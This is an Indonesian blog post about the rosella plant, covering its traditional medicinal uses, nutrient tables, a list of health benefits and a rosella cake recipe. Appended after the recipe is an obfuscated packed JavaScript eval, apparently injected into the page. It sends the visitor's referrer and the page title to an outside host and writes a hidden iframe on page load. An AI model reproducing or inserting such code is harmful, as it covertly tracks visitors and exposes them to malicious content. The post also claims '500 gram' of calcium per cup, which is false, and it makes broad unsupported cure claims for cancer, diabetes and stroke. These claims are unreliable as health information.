browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

Si Merah Rosella

Posted by on November 28, 2013

ROSELA

Berkat cara penanaman dan pengembang biakan yang relatif mudah membuat si cantik yang satu ini makin digemari masyarakat.

Rosella sering disebut merambos ijo di Jawa Tengah, kesew jawe di Sumatera Selatan atau asam rejang di Muara Enim. Sebenarnya tanaman ini memiliki nama latin  Hibiscus sabdariffa.

Di Indonesia penggunaan rosela sudah mulai dikenal sebagai minuman kesehatan. Di negara-negara lain pemanfaatan rosela dalam dunia kesehatan sudah tidak asing lagi.

Di india, Afrika, dan Mexico, seluruh tanaman rosela berfungsi sebagai obat tradisional. Daun dan kelopak bunga yang direbus dengan air diakui berkasiat sebagai peluruh kencing dan merangsang keluarnya empedu dari hati. Selain itu juga dapat menurunkan tekanan darah, mengurangi kekentalan darah dan meningkatkan peristaltik usus.  Di Senegal, seorang ahli farmakognosi bahkan telah merekomendasikan ekstrak kelopak rosela untuk menurunkan tekanan darah tinggi.

Tentu saja hal ini tidak mengherankan karena banyak kandungan vitamin, zat gizi dan nutrisi pada Rosella yang bermanfaat bagi kesehatan.  Bahkan Menurut Prof. Dr. Ir Ali Khomsan MS, pakar gizi dari Institut Pertanian Bogor, kandungan nutrisi yang paling menonjol dalam teh rosella adalah vitamin C yang ternyata enam kali lipat lebih banyak daripada sebuah jeruk.
Kandungan lain yang juga menonjol dalam teh rosella adalah kalsium. Secangkir teh rosella mengandung 500 gram kalsium. Jumlah kalsiumnya jauh lebih tinggi dibanding segelas susu (350 gram). Selain membantu mencegah osteoporosis,  teh rosella juga dapat membantu mencegah dan menyembuhkan penyakit darah tinggi. Kalsium dalam teh rosella akan membantu mengusir kandungan natrium atau garam yang terlalu tinggi dalam tubuh. Kandungan natrium yang terlalu tinggi dapat menyebabkan meningkatkan tekanan darah.
Selain mengandung Kalsium dan vitamin C yang tinggi, kelopak bunga rosela juga mengandung vitamin A dan 18 jenis asam amino yang diperlukan tubuh. Salah satunya adalh arginin yang berperan dalam proses peremajaan sel tubuh. Disamping itu rosela juga mengandung protein, kalsium, dan unsur-unsur lain yang berguna bagi tubuh.  Dikutip dari situs rosela,  kandungan senyawa rosella dapat dilihat sebagai berikut:

Kandungan senyawa kimia dalam kelopak bunga rosela.
———————————————————————–
Nama senyawa Jumlah
———————————————————————–
Campuran asam sitrat dan malat 13%
Anthocyanin gossipetin (hydroxyflavone) 2%
Vitamin C 0,004-0,005%
protein
Berat segar 6,7%
Berat kering 7,9%
———————————————————————-

Kandungan asam lemak dalam biji rosela
Asam miristin 2,1%
Asam palmitin 35,2%
Asam palmitolik 2%
Asam stearat 3,4%
Asam oleat 34%
Asam linoleat 14,4%

Kandungan sterol dalam minyak biji rosela
b- sitosterol 61,3%
kampasterol 15,5%
kolesterol 5,1%
ergosterol 3,2%
—————————–

rosela sebagai anti oksidan

Selengkapnya mengenai nutrisi Rosella dapat dibaca di KANDUNGAN NUTRISI ROSELLA

Beberapa manfaat si merah ini bagi kesehatan diantaranya adalah:
- Menurunkan Hipetensi
- Bersifat detoksifikasi (menetralkan racun)
- Menghambat tumbuhnya kanker
- Menurunkan kolestrol dalm darah
- Menurunkan kadar gula dalam darah
pada penderita diabetus melitus
- Mencegah timbulnya batuk kronis
- Mencegah osteoporisis
- Menjaga stamina
- Mencegah stroke
- Mencegah panas dalam
- Melancarkan buang air besar
- Menurunkan penggumpalan lemak dihati
- Mengurangi migran/sakit kepala
- Mengandung Vitamin C dosis tinggi
- Melangsingkan tubuh
- Membantu pemulihan ketergantungan obat
- Menjaga kesehata hati
- Menghaluskan kulit
- dll

Nah, jika biasanya rosella disajikan sebagai minuman (teh atau sirup), selai maupun shake, mungkin varian resep dari A LA CHEF berikut layak dicoba:

BOLU MARKISA ROSELLA

Bahan :

200 g  mentega
200 g  gula halus
200 g  terigu
3 butir telur
1/2 sdt baking powder
1/2 sdt vanili bubuk
1/4 sdt garam
100 ml sirup markisa

Topiing :

1/2 kg gula halus
Bunga rosella secukupnya
Air secukupnya
Meses warna warni

Cara membuat :

  1. Kocok mentega dan gula halus sampai rata. Tambahkan baking powder, vanili, garam, telur, kocok sampai rata.
  2. Tambahkan setengah sirup markisa dan setengah terigu, aduk rata.
  3. Tambahkan kembali sisa sirup markisa dan sisa terigu, aduk hingga rata.
  4. Panggang dalam oven 180 derajat celcius selama 45 menit. Angkat. Sisihkan.
  5. Rebus air dengan bunga rosella sampai air berubah menjadi merah. Angkat.
  6. Campur gula halus dengan air rebusan rosella, aduk hingga rata dan berwarna pink.
  7. Olesi bolu dengan topping rosella di seluruh permukaannya.
  8. Taburi dengan meses warna warni dan hias di pinggir bolu dengan bunga rosella.
  9. Siap dihidangkan.

 
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

Leave a Reply